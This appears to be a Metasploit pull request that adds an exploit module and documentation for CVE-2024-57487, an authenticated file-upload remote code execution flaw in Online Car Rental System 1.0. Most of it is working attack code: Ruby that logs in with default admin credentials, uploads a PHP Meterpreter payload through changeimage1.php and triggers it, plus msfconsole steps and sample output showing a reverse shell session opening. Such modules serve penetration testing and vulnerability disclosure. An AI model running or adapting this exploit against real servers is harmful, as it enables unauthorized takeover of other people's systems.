### PR TITLE
New Exploit Module & Documentation for CVE-2024-57487

### DIFF
--- a/documentation/modules/exploit/multi/http/carrental_fileupload_rce.md
+++ b/documentation/modules/exploit/multi/http/carrental_fileupload_rce.md
@@ -1,10 +1,9 @@
-# Car Rental System 1.0 Authenticated File Upload RCE
-
 ## Vulnerable Application
 
 The **Online Car Rental System 1.0** is vulnerable to **Authenticated Remote Code Execution (RCE)** due to an insecure file upload mechanism. Specifically, the `changeimage1.php` endpoint in the admin panel does not validate uploaded file types, allowing authenticated users to upload arbitrary PHP scripts. These scripts can be accessed and executed via a predictable file path, leading to full remote code execution.
 
-This module exploits the vulnerability by authenticating to the admin panel, uploading a malicious PHP payload using the vulnerable endpoint, and executing it to gain remote access.
+This module exploits the vulnerability by authenticating to the admin panel, uploading a malicious PHP payload
+using the vulnerable endpoint, and executing it to gain remote access.
 
 - **CVE**: [CVE-2024-57487](https://nvd.nist.gov/vuln/detail/CVE-2024-57487)
 - **Author**: Aaryan Golatkar
@@ -83,7 +82,7 @@ If successful, you will receive a Meterpreter shell.
 
 ---
 
-## Example Scenarios
+## Scenarios
 
 ```bash
 msf exploit(multi/http/carrental_fileupload_rce) > check

--- a/documentation/modules/exploit/multi/http/carrental_fileupload_rce.md
+++ b/documentation/modules/exploit/multi/http/carrental_fileupload_rce.md
@@ -1,0 +1,121 @@
+# Car Rental System 1.0 Authenticated File Upload RCE
+
+## Vulnerable Application
+
+The **Online Car Rental System 1.0** is vulnerable to **Authenticated Remote Code Execution (RCE)** due to an insecure file upload mechanism. Specifically, the `changeimage1.php` endpoint in the admin panel does not validate uploaded file types, allowing authenticated users to upload arbitrary PHP scripts. These scripts can be accessed and executed via a predictable file path, leading to full remote code execution.
+
+This module exploits the vulnerability by authenticating to the admin panel, uploading a malicious PHP payload using the vulnerable endpoint, and executing it to gain remote access.
+
+- **CVE**: [CVE-2024-57487](https://nvd.nist.gov/vuln/detail/CVE-2024-57487)
+- **Author**: Aaryan Golatkar
+- **Disclosure Date**: 13/01/2025
+
+---
+
+## Verification Steps
+
+### Vulnerable Application Installation Setup
+
+#### For Windows:
+1. Start Apache and MySQL via the **XAMPP Control Panel**.
+2. Extract the Online Car Rental System 1.0 source code.
+3. Place the extracted folder inside `htdocs` (e.g., `C:\xampp\htdocs\carrental`).
+4. Navigate to `http://localhost/phpmyadmin` in your browser.
+5. Create a database (e.g., `carrental_db`), and import the SQL dump (`carrental.sql`) provided in the `database` directory.
+6. Visit `http://localhost/carrental/` to verify installation.
+
+#### For Linux:
+1. Start services: `sudo systemctl start apache2 && sudo systemctl start mysql`
+2. Install PHPMyAdmin: `sudo apt install phpmyadmin -y`
+3. Edit `/etc/apache2/apache2.conf` and append:
+   ```
+   Include /etc/phpmyadmin/apache.conf
+   ```
+4. Extract the project into `/var/www/html/`
+5. Follow the same steps as Windows from here onward.
+
+---
+
+## Exploit Module Usage
+
+### Start msfconsole and load the exploit:
+
+```bash
+msfconsole
+use exploit/multi/http/carrental_fileupload_rce
+```
+
+### Set the required options:
+
+```bash
+set rhosts <target_ip>
+set rport <port>
+set targeturi /carrental
+set username <admin_username>      # Default: admin
+set password <admin_password>      # Default: Test@12345
+set lhost <your_ip>
+set lport <your_port>
+```
+
+---
+
+## Checking Target Vulnerability
+
+```bash
+check
+```
+
+If vulnerable, you will see:
+
+```
+[+] <IP> The target appears to be the Online Car Rental System.
+```
+
+---
+
+## Launching the Exploit
+
+```bash
+exploit
+```
+
+If successful, you will receive a Meterpreter shell.
+
+---
+
+## Example Scenarios
+
+```bash
+msf exploit(multi/http/carrental_fileupload_rce) > check
+[*] Checking if target is vulnerable...
+[+] 192.168.1.103:80 - The target appears to be the Online Car Rental System.
+
+msf exploit(multi/http/carrental_fileupload_rce) > exploit
+[*] Started reverse TCP handler on 192.168.1.104:4444 
+[*] Uploading PHP Meterpreter payload as WxAqV7.php...
+[+] Payload uploaded successfully!
+[*] Executing the uploaded shell at /carrental/admin/img/vehicleimages/WxAqV7.php...
+[*] Sending stage (40004 bytes) to 192.168.1.103
+[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.103:60615)
+
+meterpreter > sysinfo
+Computer    : DESKTOP-1234
+OS          : Windows NT 10.0 build 19045 (Windows 10)
+Meterpreter : php/windows
+```
+
+---
+
+## Options
+
+| Option       | Required | Description                                           |
+|--------------|----------|-------------------------------------------------------|
+| `TARGETURI`  | Yes      | The base path to the Car Rental System (e.g., `/carrental`) |
+| `USERNAME`   | Yes      | Admin username (default: `admin`)                    |
+| `PASSWORD`   | Yes      | Admin password (default: `Test@12345`)               |
+| `RHOSTS`     | Yes      | The target IP address                                |
+| `RPORT`      | Yes      | The target web server port (default: 80)             |
+| `LHOST`      | Yes      | The local host to receive the reverse shell          |
+| `LPORT`      | Yes      | The local port to receive the reverse shell          |
+
+---

--- a/documentation/modules/exploit/multi/http/carrental_fileupload_rce.md
+++ b/documentation/modules/exploit/multi/http/carrental_fileupload_rce.md
@@ -2,6 +2,9 @@
 
 The **Online Car Rental System 1.0** is vulnerable to **Authenticated Remote Code Execution (RCE)** due to an insecure file upload mechanism. Specifically, the `changeimage1.php` endpoint in the admin panel does not validate uploaded file types, allowing authenticated users to upload arbitrary PHP scripts. These scripts can be accessed and executed via a predictable file path, leading to full remote code execution.
 
+You can download the vulnerable software from the following link:
+🔗 [Online Car Rental System 1.0 - Source Code](https://code-projects.org/online-car-rental-using-php-source-code/)
+
 This module exploits the vulnerability by authenticating to the admin panel, uploading a malicious PHP payload
 using the vulnerable endpoint, and executing it to gain remote access.
 

--- a/modules/exploits/multi/http/carrental_fileupload_rce.rb
+++ b/modules/exploits/multi/http/carrental_fileupload_rce.rb
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_url = normalize_uri(target_uri.path, "admin/img/vehicleimages/#{payload_name}")
 
     print_status("Executing payload at #{payload_url}...")
-    res = send_request_cgi(
+    send_request_cgi(
       'uri' => payload_url,
       'method' => 'GET'
     )

--- a/modules/exploits/multi/http/carrental_fileupload_rce.rb
+++ b/modules/exploits/multi/http/carrental_fileupload_rce.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2024-57487'],
-          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-57487']
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-57487'],
         ],
         'DisclosureDate' => '2025-01-13',
         'Platform' => 'php',
@@ -52,13 +52,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'admin/'))
-    return CheckCode::Unknown('Failed to access the target.') unless res && res.code == 200
+    return CheckCode::Unknown('Failed to access the target.') unless res&.code == 200
 
-    if res.body.include?('Online Car Rental System')
+    if res.body.include?('Car Rental Portal')
       return CheckCode::Appears('The target appears to be the Online Car Rental System.')
     end
 
-    CheckCode::Safe
+    CheckCode::Safe('Online Car Rental System not detected')
   end
 
   def login
@@ -70,18 +70,18 @@ class MetasploitModule < Msf::Exploit::Remote
         'username' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
         'login' => ''
-      }
+      },
+      'keep_cookies' => true
     )
 
-    unless res && res.code == 200 && res.get_cookies.include?('PHPSESSID')
+    unless res&.code == 200 && res.get_cookies.include?('PHPSESSID')
       fail_with(Failure::NoAccess, 'Failed to authenticate with the target.')
     end
 
     print_good('Authentication successful.')
-    res.get_cookies
   end
 
-  def upload_shell(cookie)
+  def upload_shell(_cookie = nil)
     payload_name = "#{Rex::Text.rand_text_alphanumeric(5)}.php"
     payload = get_write_exec_payload(unlink_self: true)
 
@@ -95,11 +95,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'admin/changeimage1.php?imgid=1'),
       'method' => 'POST',
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-      'data' => post_data.to_s,
-      'cookie' => cookie
+      'data' => post_data.to_s
     )
 
-    unless res && res.code == 200
+    unless res&.code == 200
       fail_with(Failure::UnexpectedReply, 'Failed to upload payload.')
     end
 
@@ -108,21 +107,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    cookie = login
-
-    payload_name = upload_shell(cookie)
+    login
+    payload_name = upload_shell
     payload_url = normalize_uri(target_uri.path, "admin/img/vehicleimages/#{payload_name}")
 
     print_status("Executing payload at #{payload_url}...")
-    send_request_cgi(
+    res = send_request_cgi(
       'uri' => payload_url,
       'method' => 'GET'
     )
 
-    # if res && res.code == 200
-    #   print_good('Payload executed successfully. Check your session.')
-    # else
-    #   fail_with(Failure::UnexpectedReply, 'Failed to execute payload.')
-    # end
   end
 end

--- a/modules/exploits/multi/http/carrental_fileupload_rce.rb
+++ b/modules/exploits/multi/http/carrental_fileupload_rce.rb
@@ -1,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Car Rental System 1.0 File Upload RCE (Authenticated)',
+        'Description' => %q{
+          This module exploits an authenticated remote code execution vulnerability in the
+          Online Car Rental System 1.0 via the `changeimage1.php` endpoint. An authenticated
+          attacker can upload malicious PHP scripts without proper validation, enabling
+          arbitrary code execution on the server.
+        },
+        'Author' => ['Aaryan Golatkar'],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-57487'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-57487']
+        ],
+        'DisclosureDate' => '2025-01-13',
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Privileged' => false,
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path to Online Car Rental System', '/']),
+        OptString.new('USERNAME', [true, 'The admin username', 'admin']),
+        OptString.new('PASSWORD', [true, 'The admin password', 'Test@12345']),
+        OptInt.new('SHELL_TIMEOUT', [false, 'Seconds to wait for shell execution', 5])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'admin/'))
+    return CheckCode::Unknown('Failed to access the target.') unless res && res.code == 200
+
+    if res.body.include?('Online Car Rental System')
+      return CheckCode::Appears('The target appears to be the Online Car Rental System.')
+    end
+
+    CheckCode::Safe
+  end
+
+  def login
+    print_status('Attempting to authenticate...')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin/'),
+      'method' => 'POST',
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'login' => ''
+      }
+    )
+
+    unless res && res.code == 200 && res.get_cookies.include?('PHPSESSID')
+      fail_with(Failure::NoAccess, 'Failed to authenticate with the target.')
+    end
+
+    print_good('Authentication successful.')
+    res.get_cookies
+  end
+
+  def upload_shell(cookie)
+    payload_name = "#{Rex::Text.rand_text_alphanumeric(5)}.php"
+    payload = get_write_exec_payload(unlink_self: true)
+
+    print_status("Uploading payload as #{payload_name}...")
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(payload, 'application/x-php', nil, "form-data; name=\"img1\"; filename=\"#{payload_name}\"")
+    post_data.add_part('', nil, nil, 'form-data; name="update"')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin/changeimage1.php?imgid=1'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s,
+      'cookie' => cookie
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Failed to upload payload.')
+    end
+
+    print_good('Payload uploaded successfully.')
+    payload_name
+  end
+
+  def exploit
+    cookie = login
+
+    payload_name = upload_shell(cookie)
+    payload_url = normalize_uri(target_uri.path, "admin/img/vehicleimages/#{payload_name}")
+
+    print_status("Executing payload at #{payload_url}...")
+    res = send_request_cgi(
+      'uri' => payload_url,
+      'method' => 'GET'
+    )
+
+    # if res && res.code == 200
+    #   print_good('Payload executed successfully. Check your session.')
+    # else
+    #   fail_with(Failure::UnexpectedReply, 'Failed to execute payload.')
+    # end
+  end
+end

--- a/modules/exploits/multi/http/carrental_fileupload_rce.rb
+++ b/modules/exploits/multi/http/carrental_fileupload_rce.rb
@@ -91,15 +91,14 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data.add_part('', nil, nil, 'form-data; name="update"')
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'admin/changeimage1.php?imgid=1'),
+      'uri' => normalize_uri(target_uri.path, 'admin/changeimage1.php'),
       'method' => 'POST',
-      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'headers' => { 'Content-Type' => "multipart/form-data; boundary=#{post_data.bound}" },
+      'vars_get' => { imgid: '1' },
       'data' => post_data.to_s
     )
 
-    unless res&.code == 200
-      fail_with(Failure::UnexpectedReply, 'Failed to upload payload.')
-    end
+    fail_with(Failure::UnexpectedReply, 'Failed to upload payload.') unless res&.code == 200
 
     print_good('Payload uploaded successfully.')
     payload_name

--- a/modules/exploits/multi/http/carrental_fileupload_rce.rb
+++ b/modules/exploits/multi/http/carrental_fileupload_rce.rb
@@ -45,7 +45,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'Base path to Online Car Rental System', '/']),
         OptString.new('USERNAME', [true, 'The admin username', 'admin']),
         OptString.new('PASSWORD', [true, 'The admin password', 'Test@12345']),
-        OptInt.new('SHELL_TIMEOUT', [false, 'Seconds to wait for shell execution', 5])
       ]
     )
   end
@@ -55,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('Failed to access the target.') unless res&.code == 200
 
     if res.body.include?('Car Rental Portal')
-      return CheckCode::Appears('The target appears to be the Online Car Rental System.')
+      return CheckCode::Detected('The target appears to be the Online Car Rental System.')
     end
 
     CheckCode::Safe('Online Car Rental System not detected')
@@ -81,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('Authentication successful.')
   end
 
-  def upload_shell(_cookie = nil)
+  def upload_shell
     payload_name = "#{Rex::Text.rand_text_alphanumeric(5)}.php"
     payload = get_write_exec_payload(unlink_self: true)
 
@@ -112,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_url = normalize_uri(target_uri.path, "admin/img/vehicleimages/#{payload_name}")
 
     print_status("Executing payload at #{payload_url}...")
-    res = send_request_cgi(
+    send_request_cgi(
       'uri' => payload_url,
       'method' => 'GET'
     )

--- a/modules/exploits/multi/http/carrental_fileupload_rce.rb
+++ b/modules/exploits/multi/http/carrental_fileupload_rce.rb
@@ -115,6 +115,5 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => payload_url,
       'method' => 'GET'
     )
-
   end
 end


### PR DESCRIPTION

### **Title:**
Add Authenticated RCE Exploit for Car Rental System 1.0 (CVE-2024-57487)

---

### **Description:**

Hello Metasploit Team,

I am submitting a new authenticated remote code execution (RCE) exploit module for the **Online Car Rental System 1.0**, targeting a vulnerable file upload feature in the `changeimage1.php` endpoint. This vulnerability is tracked as **CVE-2024-57487** and allows authenticated users to upload arbitrary PHP files that can be executed remotely, resulting in full compromise of the target server.

---

**Summary of the Vulnerability:**

- **Vulnerable Software**: Online Car Rental System
- **Version**: 1.0
- **CVE**: [[CVE-2024-57487](https://nvd.nist.gov/vuln/detail/CVE-2024-57487)](https://nvd.nist.gov/vuln/detail/CVE-2024-57487)
- **Impact**: Authenticated users can achieve arbitrary remote code execution by uploading PHP payloads.
- **Attack Vector**: Authenticated file upload via `changeimage1.php` → Payload executes via predictable path `/admin/img/vehicleimages/`

---

**Verification Steps:**

1. Install Online Car Rental System 1.0 on a LAMP/WAMP stack.
2. Log in as an admin user (default creds: `admin` / `Test@12345`).
3. Run the module with appropriate `RHOSTS`, `TARGETURI`, `USERNAME`, `PASSWORD`, and `LHOST/LPORT`.
4. The module uploads a PHP Meterpreter payload via the vulnerable endpoint.
5. Payload is executed and a Meterpreter session is opened.

---

**Module Highlights:**

- Exploits an authenticated file upload flaw via `changeimage1.php`.
- Utilizes `Msf::Exploit::PhpEXE` mixin for flexible payload generation and cleanup.

- Includes `check` method to detect the presence of the vulnerable application.
- Leaves artifacts on disk, as expected due to the nature of the exploit.

---

**References:**

- CVE Advisory: https://nvd.nist.gov/vuln/detail/CVE-2024-57487


Please let me know if you have any questions, feedback, or requests for modifications. Thank you!

--- 
